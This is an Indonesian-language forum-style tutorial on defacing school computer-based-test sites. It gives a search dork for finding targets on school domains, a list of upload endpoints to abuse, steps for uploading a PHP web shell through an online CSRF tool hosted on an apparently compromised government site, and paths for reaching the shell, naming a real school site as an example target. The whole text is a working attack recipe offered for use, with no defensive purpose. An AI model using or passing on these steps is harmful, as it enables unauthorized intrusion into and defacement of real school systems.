Assalamualaikum saya ArdhyanX mau Share Cara Deface poc Cbt Afu White Csrf
Dork :
inurl:/cbt/login.php site:sch.id
(Kembangin lagi)
Exploit :
/panel/pages/upload-file.php
/panel/pages/upload-file.php
/panel/pages/upload_video.php
/panel/pages/upload_audio.php
/panel/pages/upload_gambar.php
/panel/pages/upload-file.php
/panel/pages/upload-fotosiswa.php
/panel/pages/upload-banner.php
/panel/pages/upload-logo.php
Post file di csrf :
uploadfile
Akses Shell nya :
www.site.com/images/shell.php
www.site.com/pictures/shell php
www.site.com/video/shell.php
Pertama :
Kalau blank (putih)
artinya vlune :v
Klau seperti itu pergi ke csrf online Tolls
http://dprd.meranginkab.go.id/Tools/Tools/Defacer/CSRF
(Blank putih = Vuln)
Post file di csrf :
uploadfile
Abis itu Klian masukin Shell nya 403 black Eagle team
Upload Shell kita
Klau ada bacaan sucses pass post Shell itu artinya udah masuk Shell kita gimana cara panggil nya nah ginh
Akses :
https://mtsn3majalengka.sch.id/cbt/images/namashell.php
Dan lihat hasilnya ;v





